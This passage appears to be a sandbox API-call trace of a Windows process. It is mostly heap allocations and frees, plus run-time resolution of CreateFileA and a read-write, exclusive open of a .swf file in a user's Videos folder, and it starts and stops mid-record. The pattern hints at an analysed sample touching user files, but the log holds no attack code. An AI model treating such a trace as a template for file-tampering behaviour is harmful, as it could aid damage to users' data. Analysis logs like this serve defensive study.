RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0042.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0042.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0042.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0042.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0042.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0042.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0042.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0042.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0042.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0042.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0042.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0042.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0042.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0042.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.719] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0042.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0042.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88c7a8 [0042.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88c7a8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0042.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0042.720] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0042.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0042.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0042.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0042.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0042.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c7a8 [0042.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88c7a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0042.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0042.720] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0042.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0042.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0042.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0042.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0042.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0042.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0042.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0042.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0042.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\urM8i1sK.swf", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0042.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x32) returned 0x7c2080 [0042.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\urM8i1sK.swf", cchWideChar=50, lpMultiByteStr=0x7c2080, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\urM8i1sK.swf", lpUsedDefaultChar=0x0) returned 50 [0042.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0042.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0042.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.721] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\urM8i1sK.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\urm8i1sk.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0042.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0042.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0042.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0042.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0042.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0042.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0042.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0042.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0042.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0042.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0042.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0042.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0042.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=50, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0042.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x64) returned 0x7c10a8 [0042.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=50, lpWideCharStr=0x7c10a8, cchWideChar=50 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\urM8i1sK.swf") returned 50 [0042.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0042.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0042.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c10a8 | out: hHeap=0x770000) returned 1 [0042.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0042.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0042.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0042.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0042.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0042.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0042.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0042.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0042.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0042.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0042.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0042.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0042.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0042.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0042.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0042.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0042.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0042.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0042.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0042.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0042.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0042.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0042.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0042.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0042.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0042.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0042.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0042.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0042.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0042.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0042.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0042.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0042.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0042.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0042.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0042.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0042.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0042.724] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0042.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0042.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0042.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0042.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0042.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0042.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0042.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0042.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0042.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0042.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0042.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0042.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0042.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0042.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0042.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0042.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0042.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0042.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0042.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0042.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0042.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0042.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0042.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0042.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0042.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0042.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0042.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0042.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0042.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0042.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0042.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0042.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0042.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0042.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0042.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.725] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0042.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0042.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0042.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0042.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0042.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0042.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0042.725] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0042.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0042.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0042.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0042.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0042.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0042.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0042.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0042.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0042.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0042.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0042.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0042.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0042.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0042.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0042.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0042.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0042.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0042.726] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0042.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0042.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0042.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0042.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0042.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0042.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0042.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0042.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0042.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0042.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.727] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0042.727] 